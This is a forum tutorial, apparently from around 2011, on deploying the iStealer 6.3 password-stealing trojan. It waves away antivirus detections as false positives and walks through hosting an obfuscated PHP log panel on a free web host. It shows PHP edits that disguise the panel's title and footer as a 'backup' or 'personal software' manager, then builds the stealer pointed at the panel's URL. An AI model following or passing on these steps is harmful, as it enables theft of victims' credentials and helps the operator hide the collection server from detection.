Also, thanks to CATMAN for the pics. I don’t take credit for the pics (except for the last one).
Rest assured, the entire tutorial is written by me and took an hour to write and format. So please reply to keep this topic alive !!!
So, lets begin !
It WILL show a virus , but its just a false positive since this is a stealer software, so don’t worry.
Report date: 2011-02-26 06:46:49 (GMT 1)
File name: istealer-6-3-legends-exe
File size: 1712128 bytes
MD5 Hash: 3e6dde21e8d59ecd96ebb077a5b4ae3d
SHA1 Hash: 951f04364f97007021b17664a8ddea32b52ad126
Detection rate: 14 on 16 (88%)
a-squared – Trojan-PWS.Win32.Dybalom!IK
Avast – Win32:Malware-gen
AVG – PSW.Generic8.YN
Avira AntiVir – TR/Spy.Gen2
BitDefender – Gen:Trojan.Heur.VP.OD0@amglpWk
ClamAV – Trojan.Spy-75681
Comodo – TrojWare.Win32.Trojan.Agent.~KRV
Dr.Web – Trojan.Siggen1.39351
F-PROT6 – W32/Trojan2.MMBV
Ikarus T3 – Trojan-PWS.Dybalom
NOD32 – Win32/TrojanDropper.VB.NPB
TrendMicro – TROJ_MDROP.ZV
VBA32 – Trojan-PSW.Win32.Dybalom.cwj
VirusBuster – Trojan.DR.VB!bKKvqH8AIGs
Scan report generated by
STEP 2 :- Making a free account at 000webhost.com
- Now , the account is made. (Confirm it from your email)
- Now, login to the account and go to the Control Panel (CPanel)
- Scroll down to MySQL under “Software / Services”.
- Follow this picture now :
- Now, SAVE the info you receive about on the next page in notepad.
- Extract iStealer 6.3 rar file and after that extract PHP Logger rar file.
- You will see PHP Logger folder.Open it.Now you see two files.
- Open index.php using notepad and follow this pic :
To remember :- The admin and admin which you entered in $username and$password line is the password to see your logs.
- Open index.php and change the following lines
- Now download and install this software : TrueBug PHP Obfuscator & Encoder. (Google for download link, trial version is also ok.)
- Open it and go to “Files and Folders”
- Now to go “Obfuscate & Encode” Set the output options as “Obfuscate & Encode” and check EVERYTHING and click “Process” then press “Close” button and also close program.
- You will find an obduscated index.php in the output folder which you selected. Now remember this is the index.php which you have to upload to 000webhost , not the original one.
$html = "<html><head><title>iStealer 6.1 Legends Log manager - ";
$html = "<html><head><title>My Personal Software manager - ";
$footer = "<div id='footer'>iStealer 6.1 Legends - Kizar Labs 2009</div></div></body></html>";
$footer = "<div id='footer'>Backup manager - Backup Script 2010</div></div></body></html>";
- Go to your Control Panel in 000webhost
- Now, Go to File Manager. If it asks for password , see the “View FTP Details” which appears beside File Manager in Control Panel.
- Now to go public_html. Then click on “New dir”. Enter the directory name like hobby or work or passion or something like that.
- Now go the the directory you just created and create further 2 sub-directories inside it as you did in the previous step.
- So it will be something like this public_html > hobby > test and work
- Now go to any of the last 2 directories you just created and click on the “Upload button” select index.php and style.css and then click the Tick button to upload.
- Go back to the root folder and tick the box beside public_html and then click on the “Chmod” button and follow this pic :
- Run the iStealer 6.3 Legends.exe (as admin if you use vista/7 )
- Enter the link to your index.php file in the Url field.
For example :- http://barney.site50.net/hobby/work/index.php
- Click on Test Url. If it shows success , then you have set up everything correctly and if it shows some error then there is something wrong you have done in the uploading part or the link was not proper.
- Now click on Build.
- To access your log , go to your web browser and enter the link to your index.php file.
CONGRATS ! Your server is now ready !!